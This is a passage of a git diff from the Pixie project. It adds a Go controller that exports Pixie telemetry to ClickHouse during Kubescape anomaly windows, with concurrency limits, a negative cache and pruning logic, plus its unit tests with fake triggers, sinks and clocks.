~3-5s serial). + type tableResult struct { + table string + sliceEnd time.Time + rows int + err error + } + results := make(chan tableResult, len(c.cfg.PushPixieTables)) + var wg sync.WaitGroup + // Per-hash concurrency limiter (knob #1: MaxParallelQueriesPerHash). + // nil → unbounded (legacy behavior preserved). + var perHashSem chan struct{} + if c.cfg.MaxParallelQueriesPerHash > 0 { + perHashSem = make(chan struct{}, c.cfg.MaxParallelQueriesPerHash) + } + for _, table := range c.cfg.PushPixieTables { + if ctx.Err() != nil { + break + } + // Knob #3: negative-cache skip. Pods that have returned 0 + // rows for this table N times in a row are skipped for TTL. + // Self-heals when TTL expires. + if c.shouldSkipEmpty(initial.Namespace, initial.Pod, table) { + continue + } + sliceStart := lastUpper[table] + sliceEnd := now + if !sliceEnd.After(sliceStart) { + continue // tiny / inverted slice — skip + } + q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now) + if err != nil { + log.WithError(err).WithField("table", table).Warn("controller: QueryFor") + continue + } + wg.Add(1) + go func(table, q string, sliceStart, sliceEnd time.Time) { + defer wg.Done() + // Per-pull reconciliation (ADAPTIVE_RECONCILE): record what + // this goroutine READ from Pixie vs WROTE to CH for this + // (pod, table, window), on EVERY return path. Deferred so a + // sem-cancel / query error / sink error all still emit a row + // — the reconcile run needs the failures, not just successes. + var readCount, wroteCount int + var recErr string + defer func() { + c.cfg.Rec.Record(ctx, reconcile.Row{ + TS: now, + Mode: "filter", + Table: table, + Namespace: initial.Namespace, + Pod: initial.Pod, + WinStart: sliceStart, + WinEnd: sliceEnd, + ReadCount: int64(readCount), + WroteCount: int64(wroteCount), + WriteErr: recErr, + Hostname: c.cfg.Hostname, + }) + }() + // Acquire per-hash slot, then optional global slot. + // Order matters: per-hash is cheap and local; global + // gates network. Releasing in reverse order avoids the + // pathological case where a stuck global slot pins a + // per-hash slot for an unrelated table. + if perHashSem != nil { + select { + case perHashSem <- struct{}{}: + case <-ctx.Done(): + recErr = ctx.Err().Error() + results <- tableResult{table: table, err: ctx.Err()} + return + } + defer func() { <-perHashSem }() + } + if c.globalSem != nil { + select { + case c.globalSem <- struct{}{}: + case <-ctx.Done(): + recErr = ctx.Err().Error() + results <- tableResult{table: table, err: ctx.Err()} + return + } + defer func() { <-c.globalSem }() + } + qctx, cancel := context.WithTimeout(ctx, 180*time.Second) + rows, qerr := c.querier.Query(qctx, q) + cancel() + if qerr != nil { + recErr = qerr.Error() + results <- tableResult{table: table, err: qerr} + return + } + // Update negative cache: 0 rows bumps streak, ≥1 row resets. + c.noteQueryResult(initial.Namespace, initial.Pod, table, len(rows)) + nrows := len(rows) + readCount = nrows + if nrows > 0 { + // Bound the sink write with its own timeout. Without + // this, a stalled CH HTTP write would hold the table + // goroutine forever, wg.Wait() would block the entire + // pass, and refreshes for the active window would stop + // — symptoms documented in our session as "fan-out + // started, no error, no push" rows in the operator log. + wctx, wcancel := context.WithTimeout(ctx, 60*time.Second) + werr := c.sink.WritePixieRows(wctx, table, rows) + wcancel() + if werr != nil { + recErr = werr.Error() + results <- tableResult{table: table, err: werr} + return + } + wroteCount = nrows + log.WithFields(log.Fields{ + "table": table, + "rows": nrows, + "hash": initial.AnomalyHash, + "pass": pass, + }).Info("pushed pixie rows for active anomaly window") + } + results <- tableResult{table: table, sliceEnd: sliceEnd, rows: nrows} + }(table, q, sliceStart, sliceEnd) + } + wg.Wait() + close(results) + for r := range results { + if r.err != nil { + // Distinguish query vs sink errors for the operator log + log.WithError(r.err).WithField("table", r.table).Warn("controller: pixie query or sink") + continue // do NOT advance lastUpper — retry next pass + } + lastUpper[r.table] = r.sliceEnd + } + + // Refresh interval treats negative as "single-shot" so callers + // can opt out via the dedicated negative sentinel; the default + // is 30s, set in defaulted(). Zero is reserved for "use default" + // to keep the env-parsing layer simple (env unset → 0 → default). + if c.cfg.PushRefreshInterval < 0 { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: fan-out complete (single-shot mode)") + return + } + if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) { + return + } + } +} + +// shouldSkipEmpty reports whether (namespace, pod, table) is currently +// in the negative cache. Returns false when knob #3 is disabled. +func (c *Controller) shouldSkipEmpty(namespace, pod, table string) bool { + if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 { + return false + } + key := namespace + "|" + pod + "|" + table + c.emptyCacheMu.Lock() + defer c.emptyCacheMu.Unlock() + until, ok := c.emptySkipUntil[key] + if !ok { + return false + } + if c.clock.Now().Before(until) { + return true + } + // TTL expired — clear it so the next call retries the query and + // can re-arm the cache from observed results. + delete(c.emptySkipUntil, key) + delete(c.emptyStreak, key) + return false +} + +// noteQueryResult updates the negative cache after a successful pixie +// query. 0 rows bumps the streak; ≥1 row resets it. Once the streak +// reaches the configured N, the (namespace, pod, table) triple is +// skipped for TTL. +func (c *Controller) noteQueryResult(namespace, pod, table string, nrows int) { + if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 { + return + } + c.emptyCacheMu.Lock() + defer c.emptyCacheMu.Unlock() + key := namespace + "|" + pod + "|" + table + if nrows > 0 { + delete(c.emptyStreak, key) + delete(c.emptySkipUntil, key) + return + } + c.emptyStreak[key]++ + if c.emptyStreak[key] >= c.cfg.EmptyResultSkipAfterN { + c.emptySkipUntil[key] = c.clock.Now().Add(c.cfg.EmptyResultSkipTTL) + } +} + +// sleepOrCancel returns true on normal sleep completion, false if ctx cancelled. +func sleepOrCancel(ctx context.Context, d time.Duration) bool { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + return false + case <-t.C: + return true + } +} + +// Active returns the count of in-memory active hashes (test helper). +func (c *Controller) Active() int { + c.mu.Lock() + defer c.mu.Unlock() + return len(c.active) +} + +// SnapshotActive returns a fresh QueryActive against CH. Exposed so +// callers (e.g. main.go) can seed the streaming ActiveSet at boot +// without having to know about Sink internals. +func (c *Controller) SnapshotActive(ctx context.Context) ([]sink.AttributionRow, error) { + return c.sink.QueryActive(ctx, c.cfg.Hostname) +} + +// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64) +// into a time.Time, auto-detecting the unit. Vector's kubescape sink in +// the soc lab writes unix SECONDS (~1.7e9), but other deployments may +// emit millis (~1.7e12) or nanos (~1.7e18) per kubescape's own field +// conventions. Magnitude check picks the unit so we don't silently +// misinterpret the same UInt64 across pipeline variants. +func eventTimeToTime(et uint64) time.Time { + switch { + case et < 1e10: + return time.Unix(int64(et), 0).UTC() // seconds + case et < 1e13: + return time.Unix(0, int64(et)*int64(time.Millisecond)).UTC() // millis + default: + return time.Unix(0, int64(et)).UTC() // nanos + } +} + +// PruneExpired removes from the in-memory active set every entry whose +// t_end has been in the past longer than a grace period. ClickHouse's +// ReplacingMergeTree handles table-side cleanup; this just keeps the +// operator's RAM bounded. +// +// The grace period (2 * cfg.After by default) bridges the gap between +// the prune timer and the next detection cycle: without it, a +// same-hash alert arriving milliseconds after a prune ran would spawn +// a fresh pushPixieRows goroutine, re-scanning the slice from +// initial.TStart and wasting Pixie query budget on data we already +// scanned. Empirically (2026-05-15) the un-graced prune accounted for +// 100% of pushPixieRows goroutine exits, none reached the natural +// "window expired" path — the prune kept racing reactivation. +// +// Caller invokes on a periodic timer. +func (c *Controller) PruneExpired() int { + now := c.clock.Now() + grace := 2 * c.cfg.After + // Collect under the lock; fire callbacks AFTER releasing so we + // don't hold the controller mutex across user code. + // + // IMPORTANT (rev-3 streaming correctness): c.active is keyed by + // anomaly hash, but the streaming layer (ActiveSet) is keyed by + // (namespace, pod). One pod can host multiple distinct hashes + // (e.g. pgsql-server has hashes for postgres, pg_isready, runc: + // [2:INIT] processes). Firing OnPrune for every evicted hash + // would prematurely stop streaming for a pod that still has + // other active hashes. So: compute the set of pods that have + // NO remaining active hashes after this prune, and only fire + // OnPrune for those. + type podKey struct{ namespace, pod string } + prunedHashes := 0 + var pruned []podKey + c.mu.Lock() + // Pass 1: delete expired hashes and remember which pods THEY + // belonged to. + candidatePods := map[podKey]struct{}{} + for h, row := range c.active { + if !row.TEnd.Add(grace).After(now) { + candidatePods[podKey{row.Namespace, row.Pod}] = struct{}{} + delete(c.active, h) + prunedHashes++ + } + } + // Pass 2: from candidatePods, remove any pod that STILL has at + // least one surviving hash in c.active. What's left is the set + // of pods that lost their LAST hash — these get OnPrune. + for _, row := range c.active { + delete(candidatePods, podKey{row.Namespace, row.Pod}) + } + for pk := range candidatePods { + pruned = append(pruned, pk) + } + c.mu.Unlock() + if c.cfg.OnPrune != nil { + for _, k := range pruned { + c.cfg.OnPrune(k.namespace, k.pod) + } + } + return prunedHashes +} diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go new file mode 100644 index 00000000000..03b5471c070 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go @@ -0,0 +1,681 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package controller + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// ---------- fakes ---------- + +type fakeTrigger struct { + ch chan kubescape.Event + err error +} + +func newFakeTrigger() *fakeTrigger { return &fakeTrigger{ch: make(chan kubescape.Event, 16)} } + +func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) { + if f.err != nil { + return nil, f.err + } + return f.ch, nil +} + +func (f *fakeTrigger) push(ev kubescape.Event) { f.ch <- ev } +func (f *fakeTrigger) close() { close(f.ch) } + +type fakeSink struct { + mu sync.Mutex + writes []sink.AttributionRow + preload []sink.AttributionRow + werr error + qerr error +} + +func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error { + return nil +} + +func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.werr != nil { + return f.werr + } + f.writes = append(f.writes, rows...) + return nil +} + +func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) { + f.mu.Lock() + defer f.mu.Unlock() + if f.qerr != nil { + return nil, f.qerr + } + out := make([]sink.AttributionRow, 0, len(f.preload)) + for _, r := range f.preload { + if r.Hostname == hostname { + out = append(out, r) + } + } + return out, nil +} + +func (f *fakeSink) snapshot() []sink.AttributionRow { + f.mu.Lock() + defer f.mu.Unlock() + return append([]sink.AttributionRow{}, f.writes...) +} + +type fakeClock struct { + mu sync.Mutex + t time.Time +} + +func (c *fakeClock) Now() time.Time { c.mu.Lock(); defer c.mu.Unlock(); return c.t } +func (c *fakeClock) advance(d time.Duration) { + c.mu.Lock() + defer c.mu.Unlock() + c.t = c.t.Add(d) +} + +// ---------- helpers ---------- + +var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC() + +func canonicalEvent() kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }, + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + } +} + +func anotherTargetEvent() kubescape.Event { + ev := canonicalEvent() + ev.Target.PID = 999999 + ev.RuleID = "R0006" + return ev +} + +func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) { + t.Helper() + stop := time.Now().Add(deadline) + for time.Now().Before(stop) { + if ok() { + return + } + time.Sleep(2 * time.Millisecond) + } + t.Fatalf("timeout waiting for %s", what) +} + +func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() { + t.Helper() + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + return func() { + trig.close() + cancel() + select { + case <-done: + case <-time.After(1 * time.Second): + t.Fatalf("controller did not stop within 1s") + } + } +} + +func defaultCfg() Config { + return Config{Hostname: "node-1", Before: 5 * time.Minute, After: 5 * time.Minute} +} + +// ---------- tests ---------- + +// TestController_NewWindow_FirstAnomalyOnTarget — first event on a hash +// produces one Sink write with t_start = event - Before, t_end = now + After. +func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 }) + got := snk.snapshot()[0] + wantHash := anomaly.Hash(canonicalEvent().Target) + if got.AnomalyHash != wantHash { + t.Fatalf("hash = %q, want %q", got.AnomalyHash, wantHash) + } + if got.PID != 106040 || got.Comm != "redis-server" || got.Namespace != "redis" { + t.Fatalf("identity wrong: %+v", got) + } + if got.Hostname != "node-1" { + t.Fatalf("Hostname = %q", got.Hostname) + } + wantStart := canonicalEventTime.Add(-5 * time.Minute) + if !got.TStart.Equal(wantStart) { + t.Fatalf("TStart = %v, want %v", got.TStart, wantStart) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v", got.TEnd, wantEnd) + } + if got.NAnomalies != 1 || got.LastRuleID != "R1005" { + t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got) + } +} + +// TestController_Coalesce_SecondAnomalySameHash — second event on the +// same target reuses the same row, increments n_anomalies, extends t_end. +func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + + clk.advance(2 * time.Minute) // 2 minutes pass; t_end should reset to now+5min + ev2 := canonicalEvent() + ev2.RuleID = "R0006" + ev2.EventTime = uint64(canonicalEventTime.Add(2 * time.Minute).UnixNano()) + trig.push(ev2) + waitFor(t, "second write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + + if c.Active() != 1 { + t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active()) + } + got := snk.snapshot()[1] + if got.NAnomalies != 2 { + t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies) + } + if got.LastRuleID != "R0006" { + t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd) + } +} + +// TestController_NeverShrinksTEnd — out-of-order arrivals or repeats +// must not regress t_end backward. +func TestController_NeverShrinksTEnd(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + originalEnd := snk.snapshot()[0].TEnd + + // fake clock REWINDS — pathological but defensive + clk.advance(-time.Hour) + trig.push(canonicalEvent()) + waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + got := snk.snapshot()[1] + if !got.TEnd.Equal(originalEnd) { + t.Fatalf("TEnd regressed: was %v, now %v", originalEnd, got.TEnd) + } +} + +// TestController_NewWindowForColdTarget — different target opens a 2nd +// active row, preserving the first. +func TestController_NewWindowForColdTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(anotherTargetEvent()) + waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 }) +} + +// TestController_Rehydrate_FromSink — boot reads still-active rows. +func TestController_Rehydrate_FromSink(t *testing.T) { + trig := newFakeTrigger() + t0 := canonicalEventTime + preload := []sink.AttributionRow{ + {AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5}, + {AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1}, + } + snk := &fakeSink{preload: preload} + clk := &fakeClock{t: t0} + c := New(trig, snk, defaultCfg(), clk) + + if err := c.Rehydrate(context.Background()); err != nil { + t.Fatalf("Rehydrate: %v", err) + } + if c.Active() != 1 { + t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active()) + } +} + +// TestController_PruneExpired — entries past their t_end drop out. +func TestController_PruneExpired(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + // PruneExpired() now waits for TEnd + 2*After (the grace period that + // prevents racing same-hash alerts arriving right after a prune from + // spawning fresh pushPixieRows goroutines that re-scan the slice). + // With Before=After=1m the row's TEnd is now+1m, so we need to advance + // past now+1m+2*1m = now+3m. + clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + if c.Active() != 0 { + t.Fatalf("Active after prune = %d, want 0", c.Active()) + } +} + +// TestController_SinkErrorNonFatal — controller does not crash on Sink.Write error. +func TestController_SinkErrorNonFatal(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{werr: errors.New("ch unreachable")} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + // Wait for the handler to process the event (no fixed sleep). + waitFor(t, "active=1 despite sink error", 200*time.Millisecond, func() bool { return c.Active() == 1 }) +} + +// TestController_RestartMidStream_Aborts — context cancel terminates Run. +func TestController_RestartMidStream_Aborts(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + + trig.push(canonicalEvent()) + waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + cancel() + select { + case <-done: + case <-time.After(300 * time.Millisecond): + t.Fatalf("controller did not abort within 300ms of cancel") + } +} + +// ──────────────────────────────────────────────────────────────── +// Callbacks (rev-3 streaming hook): OnAttribution + OnPrune +// ──────────────────────────────────────────────────────────────── + +type attrCall struct { + ns, pod string + tEnd time.Time +} + +// TestController_OnAttribution_FiresPerEvent — every kubescape +// event (new or extension) triggers exactly one OnAttribution. +func TestController_OnAttribution_FiresPerEvent(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var calls []attrCall + cfg := defaultCfg() + cfg.OnAttribution = func(ns, pod string, tEnd time.Time) { + mu.Lock() + defer mu.Unlock() + calls = append(calls, attrCall{ns, pod, tEnd}) + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(canonicalEvent()) // extension on same hash + trig.push(canonicalEvent()) + waitFor(t, "3 attribution callbacks", 300*time.Millisecond, func() bool { + mu.Lock() + defer mu.Unlock() + return len(calls) == 3 + }) + mu.Lock() + defer mu.Unlock() + for _, c := range calls { + if c.pod == "" { + t.Fatalf("callback received empty pod: %+v", c) + } + if c.tEnd.IsZero() { + t.Fatalf("callback received zero tEnd: %+v", c) + } + } +} + +// TestController_OnAttribution_NilIsNoop — nil callback must not crash. +func TestController_OnAttribution_NilIsNoop(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + cfg := defaultCfg() + cfg.OnAttribution = nil // explicit + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + trig.push(canonicalEvent()) + waitFor(t, "event landed", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + // No assertion needed beyond not panicking. +} + +// TestController_OnPrune_FiresWithKeyDetails — PruneExpired must +// emit one OnPrune callback per evicted hash, with ns + pod set. +func TestController_OnPrune_FiresWithKeyDetails(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + var mu sync.Mutex + var pruned []attrCall + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + pruned = append(pruned, attrCall{ns: ns, pod: pod}) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + mu.Lock() + defer mu.Unlock() + if len(pruned) != 1 { + t.Fatalf("OnPrune fired %d times, want 1", len(pruned)) + } + if pruned[0].pod == "" { + t.Fatalf("OnPrune called with empty pod: %+v", pruned[0]) + } +} + +// TestController_OnPrune_NilIsNoop — nil callback must not crash +// the prune loop. +func TestController_OnPrune_NilIsNoop(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + cfg := Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + cfg.OnPrune = nil // explicit + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + clk.advance(3*time.Minute + time.Second) + _ = c.PruneExpired() + // No panic = pass. +} + +// TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone — multiple +// anomaly hashes can share a single (namespace, pod) when distinct +// PID×comm combinations on the same pod each get their own +// kubescape rule firing. Real-world example (sweep observation): +// pgsql-server has hashes for processes `postgres`, `pg_isready`, +// and `runc:[2:INIT]` — three hashes, one pod. +// +// The streaming layer is pod-keyed, so OnPrune(ns, pod) must only +// fire when the LAST hash for that pod is evicted. Premature firing +// would stop the per-pod stream while other hashes are still active. +// CR feedback (controller.go:156) caught this; see comment thread. +func TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var prunedPods []string + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + prunedPods = append(prunedPods, ns+"/"+pod) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + // Two events on the SAME pod but with different (PID, Comm) so + // anomaly.Hash returns two distinct hashes. + mkEvent := func(pid uint64, comm string) kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: pid, Comm: comm, Pod: "pgsql-server-x", Namespace: "px", + }, + EventTime: uint64(canonicalEventTime.UnixNano()), + RuleID: "R1", Hostname: "node-1", + } + } + trig.push(mkEvent(100, "postgres")) + trig.push(mkEvent(200, "pg_isready")) + waitFor(t, "two distinct hashes active", 300*time.Millisecond, func() bool { + return c.Active() == 2 + }) + + // Advance past TEnd + 2*After so BOTH hashes are evictable. + clk.advance(3*time.Minute + time.Second) + if r := c.PruneExpired(); r != 2 { + t.Fatalf("PruneExpired removed %d, want 2 hashes", r) + } + mu.Lock() + defer mu.Unlock() + if len(prunedPods) != 1 { + t.Fatalf("OnPrune fired %d times for one pod with 2 hashes; want 1. Calls: %v", + len(prunedPods), prunedPods) + } + if prunedPods[0] != "px/pgsql-server-x" { + t.Fatalf("wrong pod pruned: %q", prunedPods[0]) + } +} + +// TestController_OnPrune_DoesNotFireWhileOtherHashesActive — inverse +// case: only ONE hash on a pod expires; OnPrune must NOT fire for +// that pod because other hashes for the same pod remain active. +func TestController_OnPrune_DoesNotFireWhileOtherHashesActive(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var prunedPods []string + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + prunedPods = append(prunedPods, ns+"/"+pod) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + mkEvent := func(pid uint64) kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: pid, Comm: "c", Pod: "samepod", Namespace: "ns", + }, + EventTime: uint64(canonicalEventTime.UnixNano()), + RuleID: "R1", Hostname: "node-1", + } + } + trig.push(mkEvent(100)) + waitFor(t, "1 hash", 300*time.Millisecond, func() bool { return c.Active() == 1 }) + + // Advance time so first hash's TEnd is in the past but not yet + // past the 2*After grace. Then push second hash on the same pod. + clk.advance(2 * time.Minute) + trig.push(mkEvent(200)) + waitFor(t, "2 hashes", 300*time.Millisecond, func() bool { return c.Active() == 2 }) + + // Advance to where the FIRST hash is past grace (3m after its + // creation) but the SECOND is still alive (its TEnd is at + // canonical+3m; grace would be +5m). Total clock progression + // from canonical: 2m + 1m + 1s = 3m1s. + clk.advance(time.Minute + time.Second) + removed := c.PruneExpired() + if removed != 1 { + t.Fatalf("PruneExpired removed %d, want 1 (only the old hash)", removed) + } + mu.Lock() + defer mu.Unlock() + if len(prunedPods) != 0 { + t.Fatalf("OnPrune fired for a pod that still has 1 active hash; calls: %v", prunedPods) + } +} + +// TestController_OnAttribution_NotHeldUnderMutex — a slow callback +// must NOT block PruneExpired's progress (the controller must not +// be holding its own mutex while invoking user code). +// +// We arrange a synchronous OnPrune that blocks until we signal, +// then call PruneExpired in a goroutine and confirm that we can +// independently call Active() (which acquires the same mutex) +// without deadlocking. +func TestController_OnPrune_DoesNotHoldMutex(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + pruneInCallback := make(chan struct{}) + release := make(chan struct{}) + + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + close(pruneInCallback) + <-release + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + clk.advance(3*time.Minute + time.Second) + + pruneDone := make(chan struct{}) + go func() { + _ = c.PruneExpired() + close(pruneDone) + }() + + // Wait until the prune is inside the callback. + select { + case <-pruneInCallback: + case <-time.After(500 * time.Millisecond): + t.Fatalf("OnPrune did not fire within 500ms") + } + + // Active() acquires the same mutex; if PruneExpired holds it + // across the callback, this blocks forever. + activeDone := make(chan int, 1) + go func() { activeDone <- c.Active() }() + + select { + case n := <-activeDone: + if n != 0 { + t.Fatalf("expected Active=0 (eviction happened before callback), got %d", n) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("Active() blocked — PruneExpired is holding the mutex across user callback") + } + + close(release) + <-pruneDone +} + +// TestEmptyResultSkip_NamespaceIsolation — the negative cache must +// not let one namespace's empty-streak suppress queries for a same- +// named pod in a different namespace. Two pods named "api" in "ns-a" +// vs "ns-b" sharing a single PEM node previously collided because +// the cache key was just "pod|table". +func TestEmptyResultSkip_NamespaceIsolation(t *testing.T) { + clk := &fakeClock{t: canonicalEventTime} + c := New(newFakeTrigger(), &fakeSink{}, Config{ + Hostname: "node-1", + Before: time.Minute, + After: time.Minute, + EmptyResultSkipAfterN: 2, + EmptyResultSkipTTL: 5 * time.Minute, + }, clk) + + const table = "stirling_http_events" + // Drive ns-a/api to N empty results — should arm the skip cache for ns-a/api only. + for i := 0; i < 2; i++ { + c.noteQueryResult("ns-a", "api", table, 0) + } + if !c.shouldSkipEmpty("ns-a", "api", table) { + t.Fatalf("ns-a/api should be skip-armed after 2 empties") + } + if c.shouldSkipEmpty("ns-b", "api", table) { + t.Fatalf("ns-b/api was wrongly suppressed by ns-a/api's empty streak " + + "(skip cache key conflates namespaces)") + } +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel new file mode 100644 index 00000000000..0721c6caa60 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# 